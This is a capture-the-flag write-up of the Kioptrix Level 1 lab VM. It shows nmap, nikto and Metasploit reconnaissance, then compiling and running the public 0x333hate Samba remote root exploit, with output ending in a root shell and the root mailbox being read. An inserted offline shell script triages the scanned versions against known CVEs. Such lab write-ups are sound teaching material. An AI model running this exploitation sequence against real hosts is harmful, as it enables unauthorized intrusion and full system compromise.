Kioptrix: Level 1

February 15, 2015

This is my write-up for Kioptrix 1, the first VM in the Kioptrix series by @loneferret. It is available for download from Vulnhub or the Kioptrix website.

First of all, I started with an nmap scan:

root@kali:~# nmap -sV -n -Pn -oA scans/nmap 10.1.1.30

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status      1 (RPC #100024)

I saw that ports 80 and 443 were open, so I decided to browse to them both, but they displayed nothing but the default Apache page, so I decided to run nikto against both ports to see what I could find:

nikto -host 10.1.1.30 -port 80
nikto -host 10.1.1.30 -port 443

Once nikto had finished, I had a look through both sets of results:

+ Target Host: 10.1.1.30
+ Target Port: 80
+ OSVDB-4552: GET Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: GET Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ GET mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ OSVDB-682: GET /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-3268: GET /manual/: Directory indexing found.
+ OSVDB-3092: GET /manual/: Web server manual found.
+ OSVDB-3268: GET /icons/: Directory indexing found.
+ Target Host: 10.1.1.30
+ Target Port: 443
+ OSVDB-4552: GET Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: GET Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ GET mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ OSVDB-682: GET /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-3268: GET /manual/: Directory indexing found.
+ OSVDB-3092: GET /manual/: Web server manual found.
+ OSVDB-3268: GET /icons/: Directory indexing found.

They both came back the same. I had a quick look at http://10.1.1.30/usage, but it just displayed different usage statistics for the server. In http://10.1.1.30/manual, though, there were some files for mod_perl and mod_ssl. I had a quick look online and, after a bit of digging, chose not to look too deeply at these and to come back to them later.

So next I had a look for exploits for Apache/mod_ssl/OpenSSL and came across an OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability, but after downloading the exploit and applying the necessary fixes, I still was not able to get it to work, which then led me to Samba…

I couldn't find the version using nmap, so I decided to give Metasploit's smb_version scanner a go:

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOSTS                      yes       The target address range or CIDR identifier
SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
SMBPass                     no        The password for the specified username
SMBUser                     no        The username to authenticate as
THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 10.1.1.30
RHOSTS => 10.1.1.30
msf auxiliary(smb_version) > run

[*] 10.1.1.30:139 could not be identified: Unix (Samba 2.2.1a)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
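Before moving on to exploitation, it is worth turning the banners collected so far into a list of findings. The script below is an added example and is not part of the original write-up: it pulls the product versions out of the nmap -sV and smb_version output above and flags the ones that fall below the thresholds nikto reported (Apache 1.3 below 1.3.27 and 1.3.29, mod_ssl 2.8.7 and lower) plus the Samba 2.2.x branch. The sample banners are copied from the scan output on this page; the function names, the version-compare helper and the finding messages are mine, and the page gives no version cut-off for the OpenSSL SSLv2 issue, so OpenSSL is only listed. It needs nothing beyond POSIX sh and awk and does not touch the network.

```shell
#!/bin/sh
# Added example (not part of the original write-up): extract product
# versions from the nmap -sV and smb_version output and flag the ones
# below the thresholds nikto reported. POSIX sh + awk, runs offline.

# ver_lt A B: succeed (return 0) if dotted version A sorts before B.
# Fields are compared numerically, so a trailing letter ("1a") is ignored.
ver_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i <= na) ? x[i] + 0 : 0
            yi = (i <= nb) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 1   # equal is not "less than"
    }'
}

# extract_versions: scan output on stdin -> "product version" pairs on
# stdout, de-duplicated (ports 80 and 443 carry the same banner).
extract_versions() {
    awk '
        match($0, /Apache httpd [0-9.]+/)   { print "apache "  substr($0, RSTART + 13, RLENGTH - 13) }
        match($0, /mod_ssl\/[0-9.]+/)       { print "mod_ssl " substr($0, RSTART + 8,  RLENGTH - 8) }
        match($0, /OpenSSL\/[0-9.]+[a-z]?/) { print "openssl " substr($0, RSTART + 8,  RLENGTH - 8) }
        match($0, /Samba [0-9.]+[a-z]?/)    { print "samba "   substr($0, RSTART + 6,  RLENGTH - 6) }
    ' | sort -u
}

# check_version PRODUCT VERSION: print one finding per threshold the
# version falls under. Thresholds are the ones nikto printed above; the
# OpenSSL SSLv2 issue has no version cut-off on the page, so it is skipped.
check_version() {
    case "$1" in
        apache)
            case "$2" in
                1.3.*)
                    ver_lt "$2" 1.3.27 && echo "Apache $2 < 1.3.27: CAN-2002-0839 (local overflow)"
                    ver_lt "$2" 1.3.29 && echo "Apache $2 < 1.3.29: CAN-2003-0542 (mod_rewrite/mod_cgi overflows)"
                    ;;
            esac
            ;;
        mod_ssl)
            ver_lt "$2" 2.8.8 && echo "mod_ssl $2 <= 2.8.7: CVE-2002-0082 (remote overflow)"
            ;;
        samba)
            case "$2" in
                2.2.*) echo "Samba $2: 2.2.x branch, remote root exploit available" ;;
            esac
            ;;
    esac
    return 0
}

# triage: scan output on stdin -> findings on stdout.
triage() {
    extract_versions | while read -r product version; do
        check_version "$product" "$version"
    done
}

# Constructed sample: the relevant lines copied from the scans above.
SAMPLE_SCAN='80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
[*] 10.1.1.30:139 could not be identified: Unix (Samba 2.2.1a)'

printf '%s\n' "$SAMPLE_SCAN" | triage
```

Run against the sample it prints four findings: the two Apache 1.3.20 issues, the mod_ssl 2.8.4 issue and the Samba 2.2.1a line. To use it on a real scan, pipe the nmap normal-format output (the scans/nmap.nmap file from the -oA run above) together with the smb_version output into triage; the version comparison is deliberately simple and treats 0.9.6b and 0.9.6e as equal, so letter-suffixed OpenSSL versions still need checking by hand.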

So I had a quick look for an exploit for Samba 2.2.1a and found a Samba remote root exploit, which led me to 0x333hate.c.

So I downloaded it, compiled it with gcc -o 0x333hate 0x333hate.c and ran it with ./0x333hate -t 10.1.1.30 -p 139, and as easy as that I had root:

root@kali:~# ./0x333hate -t 10.1.1.30 -p 139

[~] 0x333hate => samba 2.2.x remote root exploit [~]
[~]        coded by c0wboy ~ www.0x333.org       [~]

[-] connecting to 10.1.1.30:139
[-] stating bruteforce

[-] testing 0xbfffffff
[-] testing 0xbffffdff
[-] testing 0xbffffbff
[-] testing 0xbffff9ff
[-] testing 0xbffff7ff
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)

Next, all I had to do was read the email at /var/spool/mail/root and I was done!

cat /var/spool/mail/root

From root  Sat Sep 26 11:42:10 2009
Return-Path: <root@kioptix.level1>
Received: (from root@localhost)
by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

It was a fun and relatively quick challenge. If you are looking for more VMs to have a go at, the rest of the Kioptrix series and many more VMs are available on the Vulnhub website.
